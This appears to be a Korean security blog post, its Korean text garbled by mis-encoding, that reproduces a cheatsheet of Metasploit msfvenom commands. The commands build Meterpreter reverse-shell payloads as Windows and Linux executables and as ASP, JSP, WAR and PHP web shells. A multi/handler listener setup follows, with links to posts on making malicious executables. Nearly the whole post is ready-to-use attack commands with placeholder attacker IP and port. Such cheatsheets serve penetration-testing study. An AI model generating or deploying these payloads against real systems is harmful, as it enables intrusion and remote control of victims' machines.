๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์‹œ์Šคํ…œ ๋ณด์•ˆ

์‹œ์Šคํ…œ ๋ณด์•ˆ - ๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡ msfvenom ๋ฆฌ๋ฒ„์Šค ์‰˜ ์ œ์ž‘ ๋ช…๋ น์–ด

by Janger 2023. 1. 24.
728x90
๋ฐ˜์‘ํ˜•

 

์ถœ์ฒ˜: 

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

 

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n…

infinitelogins.com

 

์œˆ๋„์šฐ

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

 

๋ฆฌ๋ˆ…์Šค

 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

 

์›น 

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

 

 

meterpreter

 

use multi/handler
set payload linux/x86/meterpreter/reverse_tcp

set LHOST <IP>
set LPORT <PORT>

run

 

 

 

 

์‚ฌ์šฉ ๋ฐฉ๋ฒ• ์ฐธ๊ณ : 

https://security-child.tistory.com/34

 

Metasploit-msfvenom๋กœ ์ธํ•œ ๊ธฐ๋ณธ ์•…์„ฑ ์‹คํ–‰ํŒŒ์ผ ์ œ์ž‘

Msfvenom Metasploit Framework ์•ˆ์— ์œ ์šฉํ•œ ๋„๊ตฌ์ธ msfpayload, msfencode ๋“ฑ ์—ฌ๋Ÿฌ ๋„๊ตฌ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ๋Š”๋ฐ msfvenom์€ ๋ชจ๋“  ๊ธฐ๋Šฅ์„ ์ง‘ํ•ฉํ•œ ๋‹จ์ผ ๋„๊ตฌ์— ๊ฒฐํ•ฉ์„ ํ•˜์—ฌ ํ•œ์ค„ ์ฝ”๋“œ๋กœ exploit ์‹คํ–‰ ํŒŒ์ผ ๋ฐ ์•…์„ฑ ์‰˜ ์ฝ”๋“œ

security-child.tistory.com

 

https://johyungen.tistory.com/139

 

meterpreter๋ฅผ ์ด์šฉํ•œ Reverse_TCP ๊ณต๊ฒฉ (msfvenom)

*meterpreter๋ฅผ ์ด์šฉํ•œ Reverse_TCP ๊ณต๊ฒฉ bind_TCP : ํƒ€๊ฒŸ์ด ๊ณต์ธIP๋กœ ๋˜์–ด์žˆ๋Š” ๊ฒฝ์šฐ์—(์„œ๋ฒ„) Attacker๊ฐ€ ํ•ด๋‹น ํƒ€๊ฒŸ์— ๋ถ™๋Š” ๊ฒƒ reverse_TCP : ํƒ€๊ฒŸ์ด ์‚ฌ์„คIP๋กœ ๋˜์–ด์žˆ๋Š” ๊ฒฝ์šฐ์—(PC) Attacker๊ฐ€ ํ•ญ์ƒ ๊ตฌ๋™์ค‘์ธ ์ƒํƒœ์˜

johyungen.tistory.com

 

728x90
๋ฐ˜์‘ํ˜•

'๐Ÿ”’์ •๋ณด๋ณด์•ˆ > ์‹œ์Šคํ…œ ๋ณด์•ˆ' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

์‹œ์Šคํ…œ ๋ณด์•ˆ - ์‹คํ–‰ ํŒŒ์ผ์ด ์—†๋Š” ์šฐํšŒ ๊ธฐ๋ฒ•(ํŒŒ์ผ๋ฆฌ์Šค ๊ณต๊ฒฉ)  (0) 2023.02.07
์‹œ์Šคํ…œ ๋ณด์•ˆ - ํŒŒ์ด์ฌ ๋ฆฌ๋ฒ„์Šค ์‰˜ ์Šคํฌ๋ฆฝํŠธ  (0) 2023.01.25
์‹œ์Šคํ…œ ๋ณด์•ˆ - EXE ํ™•์žฅ์ž๋ฅผ ๋Œ€์ฒดํ•˜๋Š” ํ™•์žฅ์ž๋“ค(SCR, COM, BAT)  (0) 2022.10.07
์‹œ์Šคํ…œ ๋ณด์•ˆ - Jscript  (0) 2022.10.06
์‹œ์Šคํ…œ ๋ณด์•ˆ - ๋ฉ€์›จ์–ด ์ œ๋กœ(Malware Zero) ๋ฌด๋ฃŒ ์•…์„ฑ ์ฝ”๋“œ ์ œ๊ฑฐ ๋„๊ตฌ  (1) 2022.09.16

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”